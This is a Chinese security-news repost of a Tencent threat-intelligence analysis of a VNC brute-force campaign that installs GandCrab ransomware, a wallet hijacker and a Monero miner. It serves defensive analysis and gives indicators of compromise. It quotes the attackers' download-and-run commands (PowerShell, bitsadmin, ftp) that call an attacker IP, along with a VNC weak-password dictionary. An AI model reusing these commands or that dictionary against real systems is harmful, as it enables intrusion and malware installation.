freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

    “VNC劫匪”攻击预警:中招企业遭遇GandCrab 5.2等多种病毒连环暴击
    2019-03-22 09:12:53
    所属地 广东省

    一、背景

    腾讯御见威胁情报中心发现一起针对远程管理工具VNC进行大范围扫描探测,攻击者使用弱口令字典对运行VNC服务的机器进行爆破连接。爆破成功后,该团伙会在中招企业网络中运行多种病毒木马,包括GandCrab5.2勒索病毒、门罗币挖矿木马、数字货币钱包劫持木马等均被下载运行,腾讯御见威胁情报中心将该团伙命名为“VNC劫匪”。

    VNC是被广泛使用的远程管理工具,若使用者为图方便仅使用简单密码,就会给“VNC劫匪”的攻击以可趁之机。“VNC劫匪”攻击得手势必会造成服务器被黑客远程控制,信息泄露也就必然发生。随后,攻击者会根据服务器的价值不同运行不同的木马:比如,在高价值服务器上下载运行GandCrab 5.2勒索病毒加密重要系统资料实施敲诈勒索;若攻破有数字货币交易的电脑,则运行数字货币钱包劫持木马抢钱;若被攻击的只是普通电脑,没有勒索价值则被植入门罗币挖矿木马,成为“VNC劫匪”控制的矿工电脑。

    腾讯安全专家建议采用VNC远程管理工具的企业网管尽快修改管理员密码,永远不要使用弱密码配置远程管理工具。一旦被黑客暴力破解,将会给企业造成难以挽回的损失。

    二、技术分析

    2.1.  爆破攻击

    VNC是一款被广泛应用的远程控制管理工具,使用RFB协议进行屏幕画面分享及远程操作,通过VNC可以让用户在任何地方访问和控制远程桌面应用程序。黑客针对VNC进行弱口令爆破连接,然后执行命令下载木马植入。

    攻击样本执行后拷贝文件到windows目录C:\Windows\4636436463467537357\winsecmgrv.exe

    1.png


    写注册表添加为启动项

    HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Security Svcscs

    HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Security Svcscs

    2.png
    while循环中生成随机IP地址,生成IP地址时,使用例如A.B.C.D格式中A段范围30-209BCD段范围1-255,并去掉包含局域网IP地址的127172192网段IP,然后为生成的IP创建线程进行爆破攻击。

    3.png
    开始攻击前测试IP是否可以建立VNC默认端口5900的连接,并获取可用的套接字数量,若可用套接字数量大于零则使用内置的VNC弱口令进行登录

    4.png
    使用内置VNC弱口令字典

    5.png
    爆破时通过VNCRFB协议建立连接

    6.png
    发起攻击时的网络数据

    7.png
    爆破攻击成功则通过cmd执行命令下载木马wuh.exe植入,植入木马时依次通过三种方式:利用Powershell下载执行、利用bitsadmin下载执行、利用ftp脚本下载执行(ftp.exe的防火墙规则设置为允许通过) 

    命令1:

    cmd.exe /c PowerShell -ExecutionPolicy Bypass(New-Object System.Net.WebClient).DownloadFile(,27h,hxxp://92.63.197.153/wuh.exe,%temp%\496004393050.exe,27h,);Start-Process,27h,%temp%\496004393050.exe

    命令2:

    cmd.exe /c bitsadmin /transfer getitman /download/priority high hxxp://92.63.197.153/wuh.exe %temp%\49506069403.exe&start%temp%\49506069403.exe,0

    命令3:

    cmd.exe /c netsh firewall add allowedprogramC:\Windows\System32\ftp.exe "ok" ENABLE&netsh advfirewallfirewall add rule name="ok" dir=in action=allowprogram="C:\Windows\System32\ftp.exe" enable=yes,0

    cmd.exe /c "cd %temp%&@echo open92.63.197.153>>ftpget.txt&@echo tom>>ftpget.txt&@echohehehe>>ftpget.txt&@echo binary>>ftpget.txt&@echo get wuh.exe>>ftpget.txt&@echoquit>>ftpget.txt&@ftp -s:ftpget.txt&@start wuh.exe"

    8.png
    2.2.     GandCrab 勒索病毒

    爆破攻击后植入的文件muh.exe为近期十分流行的勒索病毒GandCrab V5.2版本,病毒运行后会将电脑上的文档、图片、数据库等大量的重要文件进行加密并进行勒索,提示通过访问Tor节点:hxxp://gandcrabmfe6mnef.onion/a10a45ae44a96a6e可获取付费介绍和免费解密一个文件。

     

    详细分析参考:《勒索病毒GandCrab 5.2紧急预警:冒充公安机关进行鱼叉邮件攻击》https://mp.weixin.qq.com/s/g1JMjRRiT7lMLDFa4of00A

    9.jpg

    2.3.   关联分析

    通过关联分析发现,通过同一地址(92.63.197.153),同一攻击方式(VN爆破)进行传播的除了GandCrab勒索病毒外还有数字货币钱包劫持木马、门罗币挖矿木马,这些木马文件在服务器上的文件名为1.exe、2.exe、3.exe等。黑客在VNC爆破攻击成功后,通过downloader木马进行下载植入到中招电脑。

    10.png
    2.4.  钱包劫持

    木马下载地址hxxp:// 92.63.197.153/1.exe,该木马运行后循环开剪切板并获取其中内容

    11.png
    按照格式匹配比特币、门罗币、以太坊等12种数字货币钱包地址,匹配到之后将内置的钱包地址进行替换,劫持交易过程中的收益,使用的钱包地址如下:

    1EN3bbs8UdVWA3i3ixtB9jQWvPnP9us4va 

    qrwtjnq8724e4eht9xj5ps4pqn0thxkzkgrwm28qk3 

    24fVJSDuRdQ9pLqBFaB8bVZ5vMz8ympPbRRm9bf61Hk9EjNb2iL8JAUFr6MNqj3PGR4PGXzCGYQw7UemxRoRxCC97oxADVN 

    XbRXpWWLbZRyrsGU4SbHYT2yjvmi8p5UNV 

    DTKLY1JtQTAKjuKAJrjsbrjhSmkFtsKvNV

    EbMpWJ7mrq8mPjfc28xJJew1fCLpABc9Ro 

    0xb6d8926bf0418de68a7544c717bbb4ea198769cc 

    Lcxcmpj9FZ7Sso8WWsED3h6bZMLYRLcJAh 

    49n2ySeucB3F4ni2q6So4uNfPbTmLVSNadrHzduqDJXKMDZWnv6VyTYiq4MdEF7jDdCkx9Vkk7gkyGaJs3DiS8TjJQm7cR8 

    PUJeZbWdjX1pcF6zcvxTynGER1PKpvx3hX 

    rGT84ryubURwFMmiJChRbWUg9iQY18VGuQ 

    t1UTEJ9Sv8PCTb72xCkRxc6GiE1cFpANSQ4 

    12.png
    目前能查询到比特币钱包接收到0.094BTC,以太坊钱包接收到0.186ETH,收益还不够大,证明“VNC劫匪”黑客团伙的活动才刚刚开始。

    12.1.png
    13.png


    2.5.  挖矿木马

    木马下载地址hxxp:// 92.63.197.153/2.exe,该木马运行后拷贝自身到C:\ProgramData\nEzJvZquBf\ windvcmgr.exe,并释放base64加密的挖矿配置文件cfg/cfgi

    14.png15.png


    配置文件解密内容,可以看到挖矿矿池地址为:

    92.63.197.153:7575

    登录用户名:cb946e0c-6c88-4e11-881b-56f7ecbda229

    16.png
    创建指向挖矿木马的快捷方式,并将快捷方式添加到开始菜单启动

    17.png
    然后将门罗币挖矿代码注入notepad进程进行挖矿

    18.png


    19.png
    三、安全建议

    1.   采用高强度的密码,避免使用弱口令密码,并定期更换密码。建议服务器密码使用高强度且无规律密码,并且强制要求每个服务器使用不同密码管理。

    2.   对没有互联需求的服务器/工作站内部访问设置相应控制,避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器。

    3.   对重要文件和数据(数据库等数据)进行定期非本地备份。

    4.   企业用户可在服务器部署腾讯御点终端安全管理系统防范此类病毒入侵。

    20.png
    IOCs

    feb8b98d319b6377cd1701decf075d03

    f4926ebd721231a04ccc053ba19b9ace

    d754256f4758f07b263db0f97c9757e8

    3edbca6a02ec2007493fc5fa01ad5093

    3a107ad52d454cef69ef95481b27b9e6

    cabe7d06f7e01ce4defeb28cbef8f6b4

    4467d13fc43281c1767307860a9f7c17

    e387bd817e9b7f02fa9c2511cc345f12

    7863261cd36717d171825bd82244424d

    f8edf799e18062480587d31ed010aec5

    4397481fbfffaee44195e0ba8ea8dad5

    cfa407c597a0a9edc9f03d38c3078b3c

    0f8c6e70d2847d8b77e33b67da163170

    d5a5deeacd3f51523092967b7a011804

    6ff47ee58649855896cb4d12df89fe81

    b57ed88703d7afbbb34d30ab5812ec5e

     

    IP

    92.63.197.153

     

    Domain

    rghirgsrogrshggir.ru

    rghirgsrogrshghsh.ru

    rghirgsrogrstjgrr.ru

    rghirgsrogddhjtdj.ru

    rghirgsrsrgsreidg.ru

    rghirgsrfzjjfsrzj.ru

    rghirgsrogrsfzjfs.ru

    rghirgsrogrsfsegh.ru

    rghirgsrogrhdthsr.ru

    rghirgsrogrefsesg.ru

    rghirgsrogrshggirr.su

    rghirgsrogrshghshr.su

    rghirgsrogrstjgrrr.su

    rghirgsrogddhjtdjr.su

    rghirgsrsrgsreidgr.su

    rghirgsrfzjjfsrzjr.su

    rghirgsrogrsfzjfsr.su

    rghirgsrogrsfseghr.su

     

    URL

    hxxp:// 92.63.197.153/1.exe

    hxxp:// 92.63.197.153/2.exe

    hxxp:// 92.63.197.153/3.exe

    hxxp:// 92.63.197.153/4.exe

    hxxp:// 92.63.197.153/5.exe

    hxxp:// 92.63.197.153/wuh.exe

     

    钱包:

    1EN3bbs8UdVWA3i3ixtB9jQWvPnP9us4va 

    qrwtjnq8724e4eht9xj5ps4pqn0thxkzkgrwm28qk3 

    24fVJSDuRdQ9pLqBFaB8bVZ5vMz8ympPbRRm9bf61Hk9EjNb2iL8JAUFr6MNqj3PGR4PGXzCGYQw7UemxRoRxCC97oxADVN

    XbRXpWWLbZRyrsGU4SbHYT2yjvmi8p5UNV 

    DTKLY1JtQTAKjuKAJrjsbrjhSmkFtsKvNV 

    EbMpWJ7mrq8mPjfc28xJJew1fCLpABc9Ro 

    0xb6d8926bf0418de68a7544c717bbb4ea198769cc 

    Lcxcmpj9FZ7Sso8WWsED3h6bZMLYRLcJAh 

    49n2ySeucB3F4ni2q6So4uNfPbTmLVSNadrHzduqDJXKMDZWnv6VyTYiq4MdEF7jDdCkx9Vkk7gkyGaJs3DiS8TjJQm7cR8

    PUJeZbWdjX1pcF6zcvxTynGER1PKpvx3hX 

    rGT84ryubURwFMmiJChRbWUg9iQY18VGuQ 

    t1UTEJ9Sv8PCTb72xCkRxc6GiE1cFpANSQ4

     

    矿池:

    92.63.197.153:7575

     

    VNC弱口令

    1234

    12345

    123456

    1234567

    12345678

    123123

    12341234

    54321

    654321

    321

    321321

    1234qwer

    password

    Password

    passwd

    pass

    pass123

    admin

    admin1

    Admin

    ADMIN

    admin123

    abc

    abcabc

    abc123

    abcd

    abcd1234

    abcde

    asd

    asdf

    auth

    login

    qwerty

    qwe123

    1q2w3e

    q1w2e3r

    office

    vnc

    vnc123

    account

    vncvnc

    VNC

    user

    user123

    User

    test

    testtest

    test123

    testing

    server

    Server

    computer

    pc

    guest

    homeuser

    info

    oracle

    internet

    control

    desktop

    windows

    monitor

    chageme

    temp

    manager

    owner

    secure

    usuario

    benutzer

    utente

    parola

    passwort

    geslo

    本文作者:, 转载请注明来自FreeBuf.COM

    # 勒索病毒 # GandCrab # 腾讯御见威胁情报 # VNC爆破
    被以下专辑收录,发现更多精彩内容
    + 收入我的专辑
    + 加入我的收藏
    相关推荐
    • 0 文章数
    • 0 关注者